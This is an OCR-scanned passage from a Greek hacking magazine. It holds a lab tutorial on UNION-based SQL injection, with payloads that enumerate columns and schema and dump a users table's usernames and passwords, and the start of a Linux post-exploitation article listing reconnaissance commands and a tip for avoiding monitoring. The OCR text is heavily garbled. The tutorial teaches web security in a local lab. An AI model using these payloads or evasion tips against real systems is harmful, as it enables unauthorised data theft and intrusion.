ano µια επἰθεση κρύβουν πολλούς αστάθµητους παράγοντες. Επομένως, 
οι ετοιµατζίδικες λύσεις θα εἶναι πιθανότατα αναποτελεσματικἑς. 


Για την ώρα θα σας αφήσουμε να χωνέψετε ὁσα εἰπαμε και κυρίως να 
τα δοκιμάσετε. Όμως σε δικὀ σας μηχάνημα -- και κατὰ προτίμηση κά- 
ποιο VM. Δεν χρειάζεται va το λέμε συνέχεια αυτό, ἐτσι; Στο επόμενο 
μέρος του ἄρθρου, που ξεκινὰἁ ano τη σελἰδα 72 του τεύχους που κρατά- 
τε στα χέρια σας, θα ασχοληθούμε µε το Linux και μερικὰ modules του 
Metasploit, τα οποία διευκολύνουν τη ζωὴ του επιτιθἐµενου μετὰ ano µια 
επιτυχημένη εισβολἠ... 


3. Για περισσότερες πληροφορίες µπορείτε να ανατρέχετε σ᾿ αυτόν τον πολύ καλό οδηγὀ: http://ss64.com 


6 Ἢ 


Skills: 
Intermediate 


) Tags: Injection 


point, LAMP, SQL 
injection, Union 
select, Order by, 
Concat, themole 


Αν και στις HEPEG µας οι ενώσεις (NOAITIKEG, 
οικονομικές κ.λπ.) δείχνουν σιγὰἁ σιγἁ τις 
αδυναµίεςτους, υπάρχουν περιπτώσεις που 
λειτουργούν µε αξιοθαύμαστη ικανότητα. Μετά 
τη σαρωτική επίθεση στα τυφλὰ (βλ. τεύχος 
012), ἦρθε η ώρα να δούμε µια ἄλλη τεχνικἠ SQL 
injection. Σημειώστε ὁτι αυτή η τεχνική, στην 
πιο anAn εκδοχὴ της, εκτελεἰται ευκολότερα και 
γρηγορότερα, ενώ εἶναι εξίσου αποτελεσµατικἠ 
µε ὅσα έχουμε δει ως τώρα. Το ὀνομά της εἶναι 
UNION SELECT. Όταν εἶστε ἐτοιμοι, ξεκινάμε... :) 
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Να θυμίσουμε εν τάχει ότι µε Tov ὀρο SQL injection εννοούμε το µη 
προβλεπόμενο χειρισμὸ µιας βάσης δεδομένων, μέσω της αντίστοιχης 
εφαρμογἠς web. Αυτό επιτυγχάνεται ano τα λεγόμενα σηµεία εισόδου. 
Πρόκειται για περιοχές της εφαρµογἠς, στις οποίες ο χρήστης εισάγει 
δεδομένα αυθαίρετα κι ο κὠδικας δεν κάνει σωστὸ Sanitization. Ano αυτά 
τα σημεία ο χρήστης μπορεὶ να εισαγάγει ερωτήματα (queries) προς τη 
βάση και να εκτελέσει επάνω της παράνομες λειτουργἰες. Σε κάθε εἶδος 
SQL injection --και σε αυτό που θα δούμε-- οι βασικοἱ ἀξονες της µεθο- 
δολογἱας εἶναι πάντα ἰδιοι: Αρχικἁ εντοπἰζουμε va ικανὀ σημείο εισόδου 
(injection point), στη συνέχεια βρίσκουμε τον τρόπο να το εκµεταλλευ- 
τοὐμε (exploitation) και τέλος συλλέγουμε δεδομένα απὀ τη βάση ἡ τα 
αλλοιώνουμε (information gathering ἡ data tampering). 


Μια χαραμάδα αρκεί 


O εντοπισμὸς ενὸς ικανού injection point εἶναι ἴσως ο πιο σηµαντικὀς na- 
ράγοντας. Τα πιθανὰ σημεία εισόδου που πρέπει να διερευνήσουμε εἰναι 
τα URL µε παραμέτρους GET και POST, οι φόρμες εισαγωγἠς κειμένου και 
γενικότερα κάθε λογἠς στοιχεία της εφαρμογἠς, τα οποία καθορἰζονται 
ano το χρήστη. 


Σήμερα, τόσο τα ἐμπειρα συστήματα intrusion detection, ὁσο και To πολ- 
λαπλὀ sanitization, καθιστούν το injection πολύ δύσκολο. Όχι όμως και 
ακατὀρθωτο. Φυσικά, εμεἰς δεν θα σταθούμε σε αυτὲς τις δυσκολίες, KA- 
θὠς αυτό που ενδιαφέρει εἶναι η ἴδια η τεχνικἠ και OX! οι μέθοδοι διαφυ- 
γής των ελέγχων. Πα την παρουσἰασή µας θα στηριχτούµε στην υποδομή 
που δημιουργήσαμε στο τεύχος 012, όταν μιλήσαμε για τα Blind SQL 
injections. Να θυμίσουμε OT! πρὀκειται για Eva σύστημα Linux, στο οποίο 
εἶχαμε εγκαταστήσει το πακετάκι LAMP. Αυτή τη φορά θα εμπλουτἰσου- 
µε τη βάση µε νέα δεδοµένα, αλλά και το web application που εἰχαμε 
κατασκευάσει τότε, το ONOIO θα αποκτήσει µια πρὀσθετη σελἰδα. Όλα 
όσα θα χρειαστούμµε βρίσκονται στο πακέτο UnionSQLi.zip (πττρ://ο1τ.1γ/ 
dh@13unisqli). Στο Linux µας, αποσυμπιἐζουµε το πακέτο στην επιφάνεια 
εργασίας του συστήματος και αφήνουμε Ekei τα δύο αρχεία που θα npo- 
κύψουν (update_db.sql και webapp2.php). Στη συνέχεια ανοίγουμε Eva 
τερματικὀ και κἄνουμε login στη MySQL: 


alf@nostromo ~ $ mysql -u dbo -pfrom_outer_space 


Παρατηρεἰστε ὁτι το password πρέπει να γραφτεί κολλητά µε την παρά- 
μετρο «-ρ». Επίσης, στο παράδειγµα χρησιμοποιούμε το password nou 
εἰχαμε ορἰσει εμείς για την MySQL. Προφανώς, cosis θα πρέπει να βάλετε 
το δικὀ σας password. Αφού συνδεθούμε, δίνουμε κἀτι τέτοιο: 


mysql> source ~/Desktop/update_db.sql 


Αν nave όλα καλὰ (και γιατὶ να µην ndve ἄλλωστε;) η βάση µας θα ano- 
κτήσει περισσότερους χρήστες αλλά και περισσότερα ἀρθρα. Μπορούμε 
να ελέγξουμε τα περιεχόμενα των πινάκων πληκτρολογώντας: 


mysql> use vulndb; 
Database changed 


mysql> show tables; 


Έτσι, θα εμφανιστούν ὁλοι οι πίνακες της βάσης vulndb. Πα όσους δεν 
θυμούνται, ETO! εἰχαμε ονομάσει τη βάση στην οποία επιτεθήκαμε, στο 


Η ισχύς εν τη ενώσει 
“66244244 7444444444444444444444444444444444444444444444444444444444444444344444344444444444444444144144144444144144144ἠ4441444444444444441ΗΗ147᾽ 


τεύχος 012. Αμέσως µετά μπορούμε να αποσυνδεθούµε ano τη MySQL 
και να ENIOTPEWOUHE στη γραμμὴ εντολὼν του BASH: 


mysql> exit; 


H εφαρµογή nou εἰχαμε γράψει δεν εἶναι κατάλληλη για τις δοκιμές που 
θα κάνουμε αυτή τη φορὰ. Φτιάξαμε λοιπὸν µια νέα εφαρµογή, η onoia 
κατηγοριοποιεἰ τα άρθρα ava συντάκτη και µας ενημερώνει για το πλή- 
θος των ἄρθρων που ανήκουν στον καθένα. Πα να τη χρησιμοποιήσουμε 
apkei να αντιγράψουμε το webapp2.php στο root directory του Apache 
(/var/www). Στη συνέχεια, μπορούμε να ανοίξουμε Evav web browser 
και να επισκεφθούμε τη διεύθυνση http://localhost/webapp2.php. Στο 
εξής, για οικονομία χώρου, αντἰ του κανονικού URL θα γράφουμε «web_ 
app_url» (χωρίς τα εισαγωγικἀ). Δείτε τη νέα εφαρμογἠ στην εικόνα 1. 
Mnopeite να πλοηγηθεἰτε στα άρθρα χρησιμοποιώντας τα εμφανιζόμενα 


links. Όπως θα αντιληφθεἰτε, κάθε link εισάγει στο HTTP request µια Εικόνα 1 
παράμετρο GET, µε το ὀνομα Tou αρθρογράφου (π.χ. ?author=41i3n). ης 
Δεν ξέρουμε τι σκεπτόσαστε εσείς, αλλά στα δικἁ µας μάτια μοιάζει µε να εξυπηρετήσει 
va πρὠτης τάξεως injection point! Πα την ακρίβεια, πρὀκειται για πιθανὸ μεγαλύτερο πλήθος 
string based injection point. Ας δούμε αν ισχύει κάτι τέτοιο... άρθρων. 
fax Union SQL Injection example - Mozilla Firefox Sen ee | 


File Edit View History Bookmarks Tools Help 
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Παρατηρώντας το GET request, η φαντασία µας σχηματίζει Eva query 
προς τη βάση δεδομένων µε TO WHERE clause. Με ἄλλα λόγια, φανταζὀ- 
μαστε Eva query σαν αυτό: 


SELECT * FROM pages WHERE author='41i3n' 

Αν ισχύει κάτι τέτοιο, η επἰσκειψη στο 
web_app_url?author=# 

θα ἐχει σαν αποτέλεσµα το σχηματισμὸ αυτού του query: 
SELECT * FROM pages WHERE author='#' 

Αντίστοιχα, av δοκιµἁζαμε το URL 
web_app_url?author=41i3n' AND '1'='1 

θα σχηµατιζὀταν το ακόλουθο query: 
SELECT * FROM pages WHERE author='41i3n' AND 1'-1' 


Av δοκιµάσουμε το δεύτερο παράδειγµα, θα διαπιστώσουμε ὅτι η σελἰδα 
φορτώνεται κανονικἀ (δείτε την εικὀνα 2). Ωστόσο, δεν μπορούμε va 
εἰμαστε σίγουροι ότι το περιεχόμενο που εμφανίστηκε ἦταν αποτέλεσµα 
του δικού µας query ἡ κάποιου μηχανισμού sanitization. Πα va σιγουρευ- 
τούμε, πρέπει να κάνουμε pia ακόµα δοκιμή: 


web_app_url?author=41i3n' AND '1'='@ 
Αυτό To URL θα μετατραπεί στο εξἠς query: 
SELECT * FROM pages WHERE author='41i3n' AND 1'-'Θ' 


‘Qna! Τι ἐχουμε εδώ; Κενό περιεχόµενο; Δείτε την εικὀνα 3 και θα Ka- 
ταλάβετε OT! τελικἁ δεν μεσολαβεί κανένας μηχανισμὀς sanitization. H 
εφαρµογἠ σχηματίζει και εκτελεἰ τα queries, ακριβώς ὁπως υποψιαζόμα- 
στε. Μόλις εντοπἰσαμε Eva ἐγκυρο injection point. Κάτι τέτοιες στιγμὲς 
λατρεύουμε το SQL injection :D 


H επιλογή της θέσης των quotation marks πρέπει να εἶναι προσεκτικἠ, 
ώστε να µην καταστρέφεται το συντακτικὀ της MySQL. Μια παράλειψη 
ἡ éva επιπλέον quotation mark θα διαφοροποιούσε το αποτέλεσµα σε 
τέτοιο βαθμὀ, που δεν θα μπορούσαμε να εἰμαστε σίγουροι για την £ni- 
Tuxia Tou injection. Στην περίπτωση της MySQL, ἑνας καλὸς σύμμαχος 
για να αποφεύγουμε τα συντακτικἁ λάθη εἶναι η διπλἠ παύλα (--). Αυτοί 
οι δύο χαρακτήρες ερμηνεύονται σαν την αρχἠ ενὸς σχολίου (comment) 
και κατὰ κάποιο τρόπο εξαλεἰφουν τα παραπανἰσια quotation marks. Για 
παράδειγµα, τα δύο προηγούμενα URL που δοκιμάσαμε θα μπορούσαν να 
γραφτούν κάπως έτσι: 


web_app_url?author=41i3n' AND 1=1-- ' 
ww KGL. 
web_app_url?author=411i3n' AND 1=@-- ' 


Το αποτέλεσμα εἶναι πανομοιότυπο, ενώ ἡ σύνταξη εἶναι απλούστερη και 
αφήνει μικρότερα περιθώρια λάθους. Μην σας παραξενέψει αν παρατηρἠ- 
σετε ὁτι τη χρησιμοποιούμε διαρκώς. 


In UNION we trust 


Μέχρι εδὠ εἰδαμε noc μπορούμε να παίξουμε µε TO WHERE clause ενὸς 
MySQL query. Βέβαια, στα παραπάνω παραδείγματα καταφἑρναµε να £p- 
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Φανίζουμε δεδομένα απὀ Tov πἰνακα pages και μόνο. Βλέπετε, η επιλογἠ 
του πἱνακα γινόταν ano µια περιοχἠ του query στην οποία δεν μπορού- 
cape να επἐµβουµε. Αναρωτιέστε τι μπορούμε να κάνουμε για να εµφα- 
νίσουµε δεδοµένα ano ἄλλους πἰνακες; Ἐχετε την περιέργεια να μάθετε 
πόσοι και ποιοι πίνακες υπάρχουν στη βάση; Μήπως θα θέλατε να ξέρατε 
πόσες και ποιες στήλες περιλαμβάνει κάθε πίνακας; Για va ικανοποιἠήσου- 
µε την περιἐργειὰ µας, θα αξιοποιήσουµε την EvTOAN UNION. 


Σε γενικὲς γραμμὲς, Eva query µε την EVTOAN UNION συνενώνει Ta ano- 
τελέσματα δύο διαφορετικὠν queries. Ας δούμε Eva παράδειγµα: 


SELECT Τ1,Τ2 FROM table1 UNION SELECT {1,12 FROM table2 


Το παραπάνω query επιστρέφει σαν αποτέλεσμα Evav δισδιάστατο niva- 
κα, ο οποίος περιλαμβάνει τα πεδία (μπορείτε να φαντάζεστε σαν στήλες) 
f1 και f2 του πἰνακα table2, κι ακριβώς δίπλα τα πεδία {1 και {2 του πίνακα 
table1. Προφανώς, για να λειτουργήσει αυτό το παράδειγµα πρέπει va 
υπάρχουν οι δύο πίνακες (table1 και table2) και να περιέχουν πεδία µε Ta 
συγκεκριµένα ονόματα (f1 και f2). 


H λειτουργία της εντολἠς UNION ἐχει μόνον vav περιορισμὸ: Τα ερω- 
τήματα (queries) που ενώνονται πρέπει να αφορούν σε ισάριθμα πεδἰα. 
Με ἄλλα λόγια, δεν θα μπορούσαμε να ενώσουμε Eva query nou αναζητά 
στοιχεία σε τρία πεδία, µε κἄποιο ἄλλο query, το οποἰο αναζητά στοιχεία 
σε Eva ἡ δύο πεδία. Αυτός ο περιορισμός μοιάζει να δυσκολεύει τη χρήση 
της UNION, αλλά στην πραγματικότητα θα µας βοηθήσει πάρα πολύ. Συ- 
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γκεκριμένα, θα τον χρησιμοποιήσουμε για va αντλήσουμε πληροφορἱες 
για τη δοµή της βάσης και των πινάκων της, µε τη μέθοδο της εἰς ἄτοπον 
απαγωγἠς. Όμως, πριν φτάσουμε σ’ αυτό ας δούµε τη γενικἠ µορφή των 
URL που θα χρησιμοποιούμε: 


web_app_url?author=41i3n' UNION SELECT newquery-- 


‘Eva URL αυτής της µορφἠς θα ἐχει σαν αποτέλεσµα το σχηματισμό του 
ακὀλουθου query: 


SELECT * FROM pages WHERE author='41i3n' UNION SELECT newquery-- " 


Ὅπως αντιλαμβάνεστε, η υπόθεση θα παιχτεὶ στον κατάλληλο σχηµατι- 
OHO του newquery απὸ μέρους µας... 


Η στιγµἠ της επίθεσης 


Πριν ξεκινήσουμε, να υπενθυμίσουμε OT! στη MySQL δίνοντας SELECT 
1,2,3 επιλέγουμε τις τρεις πρώτες στήλες ενός πίνακα, ανεξάρτητα ano 
το ὀνομὰ τους. Ας δούµε λοιπὀν πὠς μπορούμε να μάθουμε το πλήθος 
των πεδίων του πίνακα pages. Τα φυσιολογικά ερωτήματα της εφαρµογἠς 
προς τη βάση, χρησιμοποιούν τον αστερἰσκο κι αναφέρονται σε όλα τα 
πεδία του πίνακα pages. Θυμηθείτε το αυτό. Σύμφωνα µε τα ὁσα εἰπαμε 
προηγουμένως, αν τα δύο συνενωμένα ερωτήματα ¿xouv τον ἰδιο αριθµό 
πεδίων, τότε το συνολικὀ ερώτημα θα εκτελεστεὶ χωρὶς πρόβλημα. Έτσι, 
ξεκινάμε µε την εξἠς δοκιμή: 


web_app_url?author=41i3n' UNION SELECT 1-- 


Το αποτέλεσµα που παἰρνουμε εἶναι µια κενἠ σελἰδα. Apa το ερώτημα δεν 
επέστρεψε τίποτα. AUTO σημαίνει ὁτι τα δύο ερωτήματα δεν εἶχαν τον ἰδιο 
αριθµὀ πεδίων. Το πρῶτο ερώτημα βέβαια αναφερόταν σε όλα τα πεδία 
του πἰνακα pages, ενώ το δεύτερο ερώτημα αναφερόταν σε Eva μόνο 
πεδίο. Επομένως, το πλήθος των πεδίων του πἰνακα pages εἶναι διάφορο 
Tou ἐνα. Ας δοκιµάσουμµε µε δύο: 


web_app_url?author=41i3n' UNION SELECT 1,2-- 


Bingo! Το ερώτημα εκτελέστηκε κανονικἀ! Επομένως ο nivakac pages 
περιλαμβάνει ακριβώς δύο πεδία. 

Σε αυτὸ το συµπἐρασµα θα μπορούσαμε να καταλήξουμε και χωρὶς την 
εντολἠ UNION SELECT. Πα να μάθουμε το πλήθος των πεδίων του niva- 
κα pages, θα μπορούσαμε να χρησιμοποιήσουμε την εντολἠ ORDER BY. 
Αυτἠ η εντολἠ ταξινομεί τα αποτελέσµατα σύμφωνα µε τα περιεχόμενα 
µιας συγκεκριμένης στήλης. Δείτε πὠς θα ξεκινούσαμε: 


web_app_url?author=41i3n' ORDER ΒΥ 1-- 


Το ερώτημα που προκύπτει an’ αυτό To URL εκτελεἰται κανονικά. Επομέ- 
νως, η στήλη υπ αριθμόν Eva υπάρχει... 


web_app_url?author=41i3n' ORDER BY 2-- 


Το σχετικὀ ερώτημα EKTEAEITAI και NGAI χωρἰς κανένα πρὀβλημα. Enopż- 
νως, υπάρχει και δεύτερη στήλη... 


web_app_url?author=41i3n' ORDER BY 3-- 


Qn! Αυτἠ τη φορά το ερώτημα απέτυχε. Επομένως, ο πἰνακας pages δεν 
ἐχει τρίτη στήλη. 


Η ισχύς εν τη ενώσει 
Αα 


Επόμενο βήμα εἶναι να διαπιστώσουμε αν τα injectable πεδία μπορούν να 
παρουσιάσουν δεδομένα. Ma apxn θα δοκιμάζουμε την καθολικἠ µετα- 
βλητή (global variable) @@version, η οποία περιἐχει πάντα την ἐκδοση 
της εγκατεστηµένης SQL. Οι σχετικὲς δοκιμὲς μπορούν γίνουν ως εξἠς: 


web_app_url?author=411i3n' UNION SELECT @@version, 2-- 
web_app_url?author=41i3n' UNION SELECT 1,@@version-- 


Kal στις δύο περιπτώσεις παίρνουμε το αποτέλεσµα 
«5.5.24-Oubuntu0.12.04.1». Πλέον, γνωρἱζουµε την ἐκδοση της βάσης 
και του λειτουργικού. Γνωρίζουμε ὁμως και κἀτι πιο χρήσιμο: Και τα δύο 
πεδία μπορούν να µας παρουσιάσουν δεδομένα. Ὥρα va μαζέψουμε nE- 
ρισσότερες πληροφορίες: 


web_app_url?author=41i3n' UNION SELECT current_ 
user(),database()-- 


H εφαρµογἠ αδιαμαρτύρητα μάς πληροφορεί για Tov τρέχοντα χρήστη 
και την τρέχουσα βάση: dbo και vulndb αντίστοιχα. Έχοντας όλα αυτά 
υπόψη, θέλουμε να βρούμε τα ονόματα των ἄλλων πινάκων και τις OTN- 
λες που περιλαμβάνουν. Γνωρίζουμε ὁτι στη MySQL η πληροφορἰα auth 
υπάρχει σε Evav ειδικό πίνακα, µε το ὀνομα information_schema: 


web_app_url?author=41i3n' UNION SELECT table_name,column_name 
FROM information_schema.columns-- 


Wow! Καταιγισμὸς πληροφοριών! Αρχίζουµε να μελετάμε ὁσα εμφανίστη- 
καν και σύντομα ξεχωρίζουμε τον πολύ ενδιαφέρον πἱνακα users, µε τις 
στήλες username και password. Με φουλ αγωνία, δοκιµάζουµε τώρα το 
ακόλουθο URL: 


web_app_url?author=411i3n' UNION SELECT username, password FROM 
users-- 


Επιτυχία! H εφαρμογἠ εμφανίζει όλα τα στοιχεία των στηλών username 
και password του nivaka users. Τα passwords εμφανίζονται σε κρυπτο- 
γραφημένη µορφή, αλλά αυτό δεν µας προβληματίζει ιδιαίτερα ;) 


Πίσω στα ἐτοιμα 


Συγκριτικἀ µε την περίπτωση του blind SQL injection, Ta HTTP requests 
που κάνουμε HE αυτή την τεχνικἠ εἶναι *NOAU* λιγότερα. Ωστόσο, ορι- 
σμένα ano αυτά απαιτούν εξαιρετικἁ καλἠ γνώση της SQL και μπορεὶ 
να δυσκολευτούμε. Εξάλλου, στην προσπάθεια ανεύρεσης ενός injection 
point, εἂν τα ερωτήματα που σχηματίζει η εφαρµογἠ ἐχουν περίπλοκη 
σύνταξη, θα χρειάζονταν πολλὲς δοκιμές απὸ μέρους µας. Άλλωστε για 
µια τόσο διαδεδομένη επίθεση θα ἦταν αδύνατο να µην υπάρχουν ¿Toia 
εργαλεἰα και scripts. Όπως και στο τεύχος 012, λοιπὸν, θα χρησιµοποι- 
ἠσουμε To themole (http://themole.nasel.com.ar). Το εν λόγω εργαλείο 
απαιτεί ελάχιστες πληροφορίες ano το χρήστη. Συγκεκριμένα, ζητά- 
ει το URL της ευπαθοὺύς εφαρμογἠὴς (π.χ., το http://localhost/webapp2. 
phprauthor=41i3n) καθὼς και το NEEDLE. Να θυμίσουμε OT! το NEEDLE 
αποτελεἰ ἑνα string, το οποίο εµφανίζεται στην περίπτωση εκτέλεσης σω- 
στὠν (valid) ερωτημάτων. Όπως αντιλαμβάνεστε, το εργαλείο χρειάζεται 
να ἐχει το NEEDLE, για να καταλαβαίνει πότε µια δοκιμή ἦταν επιτυχημέ- 
νη και πότε ὀχι. Στο σενάριο που εξετάζουμε, Eva string το οποίο εμφανὶ- 
ζεται KATA την εκτέλεση σωστών ερωτημάτων εἶναι η λέξη ΜΙΤΜ (Eva ano 
τὰ ἀρθρα του πἰνακα). Ας δούµε τη χρήση Tou themole... 
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Η ισχύς εν τη ενώσει 
OLLI ih hh hp sh snddhcdddccde 


query vulndb users username, password 


Αυτὸ ἠταν ὁλο! Πήραμε ὁλες τις πληροφορἱες που θέλαμε µε ελάχιστο 
Kono και πολὺ γρήγορα. Μπορείτε να παρακολουθήσετε την εκτέλεση TOU 
προγράμματος στο βίντεο themole_union.ogv, το οποίο βρίσκεται εντὀς 
του πακέτου UnionSQLi.zip. Σημειώστε ὁτι OOO! χρησιμοποιούν Windows 
θα χρειαστούν το VLC. 


Πονηρές σκέψεις 


Πολλὲς φορὲς η αποκάλυψη δεδομένων της βάσης δεν αποτελεί αυτο- 
σκοπὀ της επίθεσης. Υπάρχουν περιπτώσεις που µπορεί κάποιος να na- 
ρακάμψει ¿va login prompt, κάνοντας inject µια συνθήκη της popp OR 
1-1 και καθιστώντας ἐτσι το login query σωστὸ (valid). Ας µην ξεχνάμε 
πως and τη στιγµή που μπορούμε να εκτελἐσουµε οποιοδήποτε ερώτημα 
θέλουμε, μπορούμε να κάνουμε οτιδήποτε θέλουμε στη βάση. Οι μόνοι 
περιορισμοί τίθενται ano τα δικαιώματα του χρήστη, µε τον οποίο ouv- 
δέεται η εφαρµογἡ στη βάση (στην περἰπτωσἠ µας ο dbo). Φανταστείτε 
τι θα συνέβαινε, αν αυτὸς ο χρήστης εἰχε τα ἴδια δικαιώματα µε το χρή- 
στη root, ολόκληρης της MySQL: Με την εντολἠἡ INSERT θα μπορούσαμε 
να δημιουργήσουμε δικούς µας χρήστες ἡ να ανεβάσουµε scripts σαν 
αντικείμενα της βάσης, προετοιμάζοντας ETO! τις μελλοντικὲς επιθέσεις 
τύπου Χ55 και LFI. Με τη χρήση της εντολἠς UPDATE θα μπορούσαμε 
να µεταβάλλουμε την τιµή ενός οποιουδήποτε πεδίου. Για παράδειγµα, 
θα μπορούσαμε να αλλάξουμε TIG τιμές μερικὠν προϊόντων σε Eva eshop 
κι αµέσως μετά va τα αγοράσουμε. Ομοίως θα μπορούσαμε να μεταβὰλ- 


Εικόνα 4 

Καλὼς ήρθατε στο 
αρχείο άρθρων του 
deltaHacker. Αυτά 
εἶναι Ta ἀρθρα Tou 
41i3n µε ολίγη ano 
τα usernames και 
Ta passwords των 
αρθρογράφων! H 
συνένωση πέτυχε. 
UNION rulez! 
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λουµε και TO βαθμὸ ενὸς µαθητἠὴ στη βάση δεδομένων του σχολείου ἡ να 
«βελτιώσουμε» το score στο hall of fame του αγαπημένου µας παιχνιδιού. 
Φυσικά, µε την ἴδια ευκολία θα μπορούσαμε και να εξαφανίσουµε δεδομέ- 
να ano τη βάση, χρησιμοποιώντας εντολὲς σαν την DELETE καιτην DROP 
TABLES. Τέλος, αν ο χρήστης ἦταν ο ἰἴδιος ο root, θα μπορούσαμε va 
χρησιμοποιήσουμε τη συνάρτηση system() της MySQL και να εκτελέσου- 
µε εντολὲς στο κέλυφος του λειτουργικού συστήματος. Πα παράδειγµα, 
θα μπορούσαμε να εκτελἑἐσουµε κἀτι τέτοιο: «system cat /etc/passwd». 


Μετὰ το τέλος, τι; 


Ὅπως αντιληφθήκατε and τη προηγούµενη παράγραφο, η κρισιµὀτητα 
μιας τέτοιας ευπάθειας εἶναι υψηλή. Την ἴδια στιγμή, στις πολύπλοκες 
εφαρμογὲς web εἶναι ano δύσκολο ως αδύνατο να µην ξεφύγει κάτι ano 
To sanitization. Εξάλλου, ακόµα και στις περιπτώσεις µε ισχυρὀ EAEYXO 
στα πιθανά injection points, υπάρχουν πολλὲς τεχνικὲς που μπορούν va 
βοηθήσουν τον επιτιθἐµενο και, συχνά-πυκνά, προκύπτουν και νέες. Πα 
αυτό το λὀγο, οι διαχειριστὲς τέτοιων συστημάτων επιστρατεύουν πολύ- 
πλοκα συστήματα Intrusion Detection και Web Application Firewalls, τα 
οποία ανιχνεύουν τις παράνομες προσπάθειες πρὀσβασης στο σύστημα. 
Επιπρόσθετα, οι διαχειριστὲς φροντίζουν ὥστε η σύνδεση της εφαρμογἠς 
web µε τη βάση να πραγματοποιείται μέσω ενὸς χρήστη µε ελάχιστα δι- 
καιώματα. Αν θέλετε να εξοικειωθεῖτε µε GUTEG TIG επιθέσεις και γίνετε πιο 
αποτελεσματικοί (επιτιθἐµενοι ἡ διαχειριστὲς) πρέπει να κάνετε πολλὲς 
δοκιμές. Να θυµόσαστε, ὀμως, OTI τα πειρἁματὰἁ σας πρέπει να γίνονται 
σε δικἀ σας συστήματα -- ἡ σε εκεἰνα για τα οποία σας ἐχει παραχωρηθεί 
η σχετικἠ ἁδεια. 


[τ Union SQL Injection example - Mozilla Firefox ΞΕ 
File Edit View History Bookmarks Tools Help 

[5 Union SQL Injection example [=] 
@  @ localhost/webapp2.php?author=41i3n' UNION SELECT username, password FROM users-- ' 
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Εσείς τι δικαιολογία έχετε που η διαφήμισή σας απουσιάζει από εδώ; 


Τολμήστε να µας την neite από το talk2us@deltahacker.gr. Όπως και να "χει θα 
επικοινωνήσουμε κι εμείς µαζί σας - ή έστω µε τον ανταγωνιστή σας ;) 
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Post-exploitation 
games on Linux 


by 41 13πΠ 


Skill: Advanced E 
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Meterpreter 


Στο ἀρθρο που αρχίζει ano τη σελίδα 46 του τεύχους, 
συζητήσαμε μεταξύ ἄλλων για τους όρους pillaging, 
pivoting, persistence και cleanup. Πρόκειται για έννοιες 
οι οποίες περιγράφουν και κωδικοποιούν όλα ὁσα 

πρέπει να κάνουµε, μετὰ απὀ µια επιτυχημένη επίθεση -- 
για την ακρίβεια εισβολή. Στη συνέχεια μελετήσαμε την 
εφαρμογἠ ὁλων αυτών σε συστήματα Windows. Όπως 
αντιλαμβάνεστε, στο παρὸν άρθρο θα ασχοληθούμε µε 
το Linux... 
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Πάμε λοιπὸν va δούμε κάποιες τεχνικὲς post exploitation, ὅταν µε κάποιο 
τρὀπο έχουμε αποκτήσει shell access σε Eva σύστημα Linux. Πολλά ano 
αυτά που θα δούμε ισχύουν και σε ἆλλα συστήµατα *nix. Πάντως, εξαι- 
τίας της φιλοσοφίας και των τεχνολογιών ασφάλειας που ενσωματώνουν 
αυτά τα συστήματα, εἶναι πιθανό να ἐχει περισταλεἰ η εκτέλεση των npo- 
γραμμάτων που θα δούμε, and τον εκάστοτε διαχειριστή. Ας ξεκινήσουμε 
HE μερικὲς εντολὲς για τη γενικότερη διερεύνηση του συστήματος. 


Επεξήγηση 


Πληροφορίες για kernel version, αρχιτεκτονικἠ, 
διανοµή κ.λπ. 


(ἡ arch) Πληροφορίες για αρχιτεκτονικἠ 

System uptime και runlevel, TTYs 

Πληροφορίες ano το τελευταίο boot του συστήµατος 
cat /proc/meminfo | Πληροφορίες για τη μνήμη του συστήµατος 
cat /proc/cpuinfo Πληροφορίες για τον επεξεργαστή 
Πληροφορίες για τον επεξεργαστἠ 


Πληροφορίες για διαύλους PCI και τις αντίστοιχες 
συσκευές 


Πληροφορίες για διαύλους USB και τις αντίστοιχες 
συσκευές 


Πληθώρα πληροφοριών για το hardware του συστή- 
ματος 


Πληροφορίες για mounted filesystems 


Πληροφορίες για mounted filesystems και τα mount- 
ing points 


Ειδικότερα για τους χρήστες του συστήµατος, μπορούμε va χρησιµοποι- 
ἡσουµμε τα ακόλουθα: 


Επεξήγηση 


Το τρέχον username και τα groups που ανήκει 
Ποιος εἶναι συνδεδεμένος, ano που, για πόση wpa κ.λπ. 


Οι πιο πρὀσφατα συνδεδεμένοι (loggeg on) χρήστες 


Lastlog Συνολικὀ log table όλων των χρηστών 


Τι θα λέγατε και για κάποιες πληροφορίες σχετικἁ µε τη δικτύωση του 
συστήµατος; 


Εντολἠ Επεξήγηση 
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Εντολἠ Επεξήγηση 


ip addr show Πληροφορίες για τις IP διευθύνσεις του συστήµατος 
ip route show Πληροφορίες για τα networking routes 
Πληροφορίες για τα networking interfaces 
Πλἠρες routing table 


cat /etc/network/ 
interfaces 


at /etc/resolv. : 
ss / e/resolv Οι DNS servers Tou συστήματος 
config 


Οι ρυθμίσεις των network interfaces 


Πίνακας μετάφρασης ano IP σε διεύθυνση MAC 


Εμφάνιση όλων των συνδεδεμένων Nodes και των 


etstat -a 
mst ne listening ports, µε sockets και timers 


Όπως παραπάνω µε εμφάνιση Kal των προγραμμά- 


tstat -a με 
ners nop των (anaitei πρὀσβαση root) 


Πλἠρες routing table 


Με τη βοήθεια των παραπάνω μπορούμε να πάρουμε πολλὲς πληροφορἰ- 
ες για TO networking του συστήματος. Εδὠ ὅμως υπάρχει µια παγίδα: H 
εκτέλεση ορισμένων προγραμμάτων εἶναι πιθανὀὸ να ενεργοποιήσει Kå- 
ποιο σύστημα παρακολούθησης (monitoring) κι αυτό µε τη σειρἁ του να 
ειδοποιήσει το διαχειριστή. Ένας πιο ανώδυνος τρόπος για να πάρουµμετις 
ίδιες πληροφορίες, εἶναι η εκτέλεση της ακὀλουθης εντολἠς: 


cat /proc/net/* 


H αλήθεια εἶναι ότι µε αυτόν τον τρόπο θα πάρουμε περισσότερες πλη- 
ροφορἱες, αλλά σε µορφή raw! Θα πρέπει να εἱμαστε υπομονετικοἰ και να 
μελετήσουμε διεξοδικἀ τα όσα εμφανιστούν. Αφού ξεμπερδέψουµε µε τη 
δικτύωση, μπορούμε να OTPAMOUHE στα προγράμματα και στις υπηρεσὶες 
που εκτελούνται. 


Εντολή Επεξήγηση 


| psaux | Λίστα όλων των active processes και services (daemons) 


top -n4-d5 εμφανιση των top processes µε 4 επαναλήψεις ava 5 δευτε- 
poAenta 


Η ποσότητα (αλλά και η ποιότητα) των πληροφοριών που μπορούμε va 
αποκτήσουμε απὀ τη γραμμὴ εντολών εἶναι τεράστια. Δείτε μερικὲς ακὀ- 
μα ενδιαφἐρουσες εντολὲς. 


Εντολή Επεξήγηση 


